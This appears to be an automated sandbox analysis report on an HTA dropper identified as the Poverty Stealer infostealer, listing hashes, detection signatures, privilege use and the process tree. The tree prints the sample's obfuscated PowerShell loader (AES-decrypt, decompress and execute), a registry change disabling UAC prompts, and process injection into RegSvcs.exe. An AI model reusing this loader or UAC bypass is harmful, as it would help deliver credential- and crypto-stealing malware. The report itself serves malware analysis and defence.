Analysis
- max time kernel: 147s
- max time network: 156s
- platform: windows10-2004_x64
- resource: win10v2004-20240226-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 05-03-2024 02:01
Static task: static1
Behavioral task: behavioral1
- Sample: 06d795336902755082d010c9a86993eb4de790d43858632b4279ddb6c17b1e1f.hta
- Resource: win7-20240221-en
Behavioral task: behavioral2
- Sample: 06d795336902755082d010c9a86993eb4de790d43858632b4279ddb6c17b1e1f.hta
- Resource: win10v2004-20240226-en
General
- Target: 06d795336902755082d010c9a86993eb4de790d43858632b4279ddb6c17b1e1f.hta
- Size: 72KB
- MD5: e09e50f4c8308806ae21242538e17e88
- SHA1: 3d5d0f3e384ec93f87716cc49487cd7ef1e8714a
- SHA256: 06d795336902755082d010c9a86993eb4de790d43858632b4279ddb6c17b1e1f
- SHA512: a5557c34562a8f2cf1ba07029f07d389788579c4333e0856da1b6b7ba09484015dbfcf8f6f43d3e21787e8ef70b82062d29ebbfaf57fc50ed6d2015b272c7259
- SSDEEP: 768:fEnAiXp/x27ioVgCtTLalOmilXO3SuDbvq572+/unhi1zOz:Mn/p/x27ioVgCtTLbmweSuPyKti5Oz
Malware Config
Signatures
Detect Poverty Stealer Payload 6 IoCs
Processes:
| resource | yara_rule |
|---|---|
| behavioral2/memory/4856-154-0x0000000000400000-0x000000000040A000-memory.dmp | family_povertystealer |
| behavioral2/memory/4856-161-0x0000000000400000-0x000000000040A000-memory.dmp | family_povertystealer |
| behavioral2/memory/4856-162-0x0000000000400000-0x000000000040A000-memory.dmp | family_povertystealer |
| behavioral2/memory/4856-163-0x0000000000400000-0x000000000040A000-memory.dmp | family_povertystealer |
| behavioral2/memory/4856-164-0x0000000000400000-0x000000000040A000-memory.dmp | family_povertystealer |
| behavioral2/memory/4856-166-0x0000000000400000-0x000000000040A000-memory.dmp | family_povertystealer |
Poverty Stealer
Poverty Stealer is a crypto and infostealer written in C++.
Processes: powershell.exe
| description | ioc | process |
|---|---|---|
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | powershell.exe |
Blocklisted process makes network request 1 IoCs
Processes: powershell.exe
| flow | pid | process |
|---|---|---|
| 41 | 3120 | powershell.exe |
Downloads MZ/PE file
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes: mshta.exe, Photoshop.exe
| description | ioc | process |
|---|---|---|
| Key value queried | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation | mshta.exe |
| Key value queried | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation | Photoshop.exe |
Executes dropped EXE 8 IoCs
Processes: Photoshop.exe, 7z.exe, 7z.exe, 7z.exe, 7z.exe, 7z.exe, 7z.exe, nmYIeCI7gcMH.exe
| pid | process |
|---|---|
| 2040 | Photoshop.exe |
| 996 | 7z.exe |
| 3480 | 7z.exe |
| 4056 | 7z.exe |
| 4416 | 7z.exe |
| 2368 | 7z.exe |
| 4084 | 7z.exe |
| 2336 | nmYIeCI7gcMH.exe |
Loads dropped DLL 6 IoCs
Processes: 7z.exe, 7z.exe, 7z.exe, 7z.exe, 7z.exe, 7z.exe
| pid | process |
|---|---|
| 996 | 7z.exe |
| 3480 | 7z.exe |
| 4056 | 7z.exe |
| 4416 | 7z.exe |
| 2368 | 7z.exe |
| 4084 | 7z.exe |
Suspicious use of SetThreadContext 1 IoCs
Processes: nmYIeCI7gcMH.exe
| description | pid | process | target process |
|---|---|---|---|
| PID 2336 set thread context of 4856 | 2336 | nmYIeCI7gcMH.exe | RegSvcs.exe |
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes: powershell.exe, powershell.exe
| pid | process |
|---|---|
| 4656 | powershell.exe |
| 4656 | powershell.exe |
| 3120 | powershell.exe |
| 3120 | powershell.exe |
Suspicious use of AdjustPrivilegeToken 26 IoCs
Processes: powershell.exe, powershell.exe, 7z.exe, 7z.exe, 7z.exe, 7z.exe, 7z.exe, 7z.exe
| description | pid | process |
|---|---|---|
| Token: SeDebugPrivilege | 4656 | powershell.exe |
| Token: SeDebugPrivilege | 3120 | powershell.exe |
| Token: SeRestorePrivilege | 996 | 7z.exe |
| Token: 35 | 996 | 7z.exe |
| Token: SeSecurityPrivilege | 996 | 7z.exe |
| Token: SeSecurityPrivilege | 996 | 7z.exe |
| Token: SeRestorePrivilege | 3480 | 7z.exe |
| Token: 35 | 3480 | 7z.exe |
| Token: SeSecurityPrivilege | 3480 | 7z.exe |
| Token: SeSecurityPrivilege | 3480 | 7z.exe |
| Token: SeRestorePrivilege | 4056 | 7z.exe |
| Token: 35 | 4056 | 7z.exe |
| Token: SeSecurityPrivilege | 4056 | 7z.exe |
| Token: SeSecurityPrivilege | 4056 | 7z.exe |
| Token: SeRestorePrivilege | 4416 | 7z.exe |
| Token: 35 | 4416 | 7z.exe |
| Token: SeSecurityPrivilege | 4416 | 7z.exe |
| Token: SeSecurityPrivilege | 4416 | 7z.exe |
| Token: SeRestorePrivilege | 2368 | 7z.exe |
| Token: 35 | 2368 | 7z.exe |
| Token: SeSecurityPrivilege | 2368 | 7z.exe |
| Token: SeSecurityPrivilege | 2368 | 7z.exe |
| Token: SeRestorePrivilege | 4084 | 7z.exe |
| Token: 35 | 4084 | 7z.exe |
| Token: SeSecurityPrivilege | 4084 | 7z.exe |
| Token: SeSecurityPrivilege | 4084 | 7z.exe |
Suspicious use of WriteProcessMemory 35 IoCs
Processes: mshta.exe, powershell.exe, powershell.exe, Photoshop.exe, cmd.exe, nmYIeCI7gcMH.exe
| description | pid | process | target process |
|---|---|---|---|
| PID 1880 wrote to memory of 4656 | 1880 | mshta.exe | powershell.exe |
| PID 1880 wrote to memory of 4656 | 1880 | mshta.exe | powershell.exe |
| PID 1880 wrote to memory of 4656 | 1880 | mshta.exe | powershell.exe |
| PID 4656 wrote to memory of 3120 | 4656 | powershell.exe | powershell.exe |
| PID 4656 wrote to memory of 3120 | 4656 | powershell.exe | powershell.exe |
| PID 4656 wrote to memory of 3120 | 4656 | powershell.exe | powershell.exe |
| PID 3120 wrote to memory of 2040 | 3120 | powershell.exe | Photoshop.exe |
| PID 3120 wrote to memory of 2040 | 3120 | powershell.exe | Photoshop.exe |
| PID 3120 wrote to memory of 2040 | 3120 | powershell.exe | Photoshop.exe |
| PID 2040 wrote to memory of 2656 | 2040 | Photoshop.exe | cmd.exe |
| PID 2040 wrote to memory of 2656 | 2040 | Photoshop.exe | cmd.exe |
| PID 2656 wrote to memory of 4188 | 2656 | cmd.exe | mode.com |
| PID 2656 wrote to memory of 4188 | 2656 | cmd.exe | mode.com |
| PID 2656 wrote to memory of 996 | 2656 | cmd.exe | 7z.exe |
| PID 2656 wrote to memory of 996 | 2656 | cmd.exe | 7z.exe |
| PID 2656 wrote to memory of 3480 | 2656 | cmd.exe | 7z.exe |
| PID 2656 wrote to memory of 3480 | 2656 | cmd.exe | 7z.exe |
| PID 2656 wrote to memory of 4056 | 2656 | cmd.exe | 7z.exe |
| PID 2656 wrote to memory of 4056 | 2656 | cmd.exe | 7z.exe |
| PID 2656 wrote to memory of 4416 | 2656 | cmd.exe | 7z.exe |
| PID 2656 wrote to memory of 4416 | 2656 | cmd.exe | 7z.exe |
| PID 2656 wrote to memory of 2368 | 2656 | cmd.exe | 7z.exe |
| PID 2656 wrote to memory of 2368 | 2656 | cmd.exe | 7z.exe |
| PID 2656 wrote to memory of 4084 | 2656 | cmd.exe | 7z.exe |
| PID 2656 wrote to memory of 4084 | 2656 | cmd.exe | 7z.exe |
| PID 2656 wrote to memory of 2072 | 2656 | cmd.exe | attrib.exe |
| PID 2656 wrote to memory of 2072 | 2656 | cmd.exe | attrib.exe |
| PID 2656 wrote to memory of 2336 | 2656 | cmd.exe | nmYIeCI7gcMH.exe |
| PID 2656 wrote to memory of 2336 | 2656 | cmd.exe | nmYIeCI7gcMH.exe |
| PID 2656 wrote to memory of 2336 | 2656 | cmd.exe | nmYIeCI7gcMH.exe |
| PID 2336 wrote to memory of 4856 | 2336 | nmYIeCI7gcMH.exe | RegSvcs.exe |
| PID 2336 wrote to memory of 4856 | 2336 | nmYIeCI7gcMH.exe | RegSvcs.exe |
| PID 2336 wrote to memory of 4856 | 2336 | nmYIeCI7gcMH.exe | RegSvcs.exe |
| PID 2336 wrote to memory of 4856 | 2336 | nmYIeCI7gcMH.exe | RegSvcs.exe |
| PID 2336 wrote to memory of 4856 | 2336 | nmYIeCI7gcMH.exe | RegSvcs.exe |
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
- C:\Windows\SysWOW64\mshta.exe
  Command line: C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\06d795336902755082d010c9a86993eb4de790d43858632b4279ddb6c17b1e1f.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
  Tree depth: 1, PID: 1880
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ivXRRY = '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';$ftUus = 'ckRTZUh1VlFmVnlTa2luUmVGS3hIRGlVRktJVGF1aEI=';$qOFHjUF = New-Object 'System.Security.Cryptography.AesManaged';$qOFHjUF.Mode = [System.Security.Cryptography.CipherMode]::ECB;$qOFHjUF.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$qOFHjUF.BlockSize = 128;$qOFHjUF.KeySize = 256;$qOFHjUF.Key = [System.Convert]::FromBase64String($ftUus);$svgDF = [System.Convert]::FromBase64String($ivXRRY);$JuzxcfzI = $svgDF[0..15];$qOFHjUF.IV = $JuzxcfzI;$ceTYAICRx = $qOFHjUF.CreateDecryptor();$SsqoZtLKt = $ceTYAICRx.TransformFinalBlock($svgDF, 16, $svgDF.Length - 16);$qOFHjUF.Dispose();$JFlSsSI = New-Object System.IO.MemoryStream( , $SsqoZtLKt );$wBZvtko = New-Object System.IO.MemoryStream;$pFgGcVXpX = New-Object System.IO.Compression.GzipStream $JFlSsSI, ([IO.Compression.CompressionMode]::Decompress);$pFgGcVXpX.CopyTo( $wBZvtko );$pFgGcVXpX.Close();$JFlSsSI.Close();[byte[]] $xIpqeQj = $wBZvtko.ToArray();$BomjpubV = [System.Text.Encoding]::UTF8.GetString($xIpqeQj);$BomjpubV | powershell -
  Tree depth: 2, PID: 4656
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
  Tree depth: 3, PID: 3120
  - UAC bypass
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
- C:\Users\Admin\AppData\Roaming\Photoshop.exe
  Command line: "C:\Users\Admin\AppData\Roaming\Photoshop.exe"
  Tree depth: 4, PID: 2040
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
- C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
  Tree depth: 5, PID: 2656
  - Suspicious use of WriteProcessMemory
- C:\Windows\system32\mode.com
  Command line: mode 65,10
  Tree depth: 6, PID: 4188
- C:\Users\Admin\AppData\Local\Temp\main\7z.exe
  Command line: 7z.exe e file.zip -p125762329330388294023250819845 -oextracted
  Tree depth: 6, PID: 996
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of AdjustPrivilegeToken
- C:\Users\Admin\AppData\Local\Temp\main\7z.exe
  Command line: 7z.exe e extracted/file_5.zip -oextracted
  Tree depth: 6, PID: 3480
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of AdjustPrivilegeToken
- C:\Users\Admin\AppData\Local\Temp\main\7z.exe
  Command line: 7z.exe e extracted/file_4.zip -oextracted
  Tree depth: 6, PID: 4056
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of AdjustPrivilegeToken
- C:\Users\Admin\AppData\Local\Temp\main\7z.exe
  Command line: 7z.exe e extracted/file_3.zip -oextracted
  Tree depth: 6, PID: 4416
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of AdjustPrivilegeToken
- C:\Users\Admin\AppData\Local\Temp\main\7z.exe
  Command line: 7z.exe e extracted/file_2.zip -oextracted
  Tree depth: 6, PID: 2368
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of AdjustPrivilegeToken
- C:\Users\Admin\AppData\Local\Temp\main\7z.exe
  Command line: 7z.exe e extracted/file_1.zip -oextracted
  Tree depth: 6, PID: 4084
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\attrib.exe
  Command line: attrib +H "nmYIeCI7gcMH.exe"
  Tree depth: 6, PID: 2072
  - Views/modifies file attributes
- C:\Users\Admin\AppData\Local\Temp\main\nmYIeCI7gcMH.exe
  Command line: "nmYIeCI7gcMH.exe"
  Tree depth: 6, PID: 2336
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
  Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
  Tree depth: 7, PID: 4856
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism (1)
Bypass User Account Control (1)
Downloads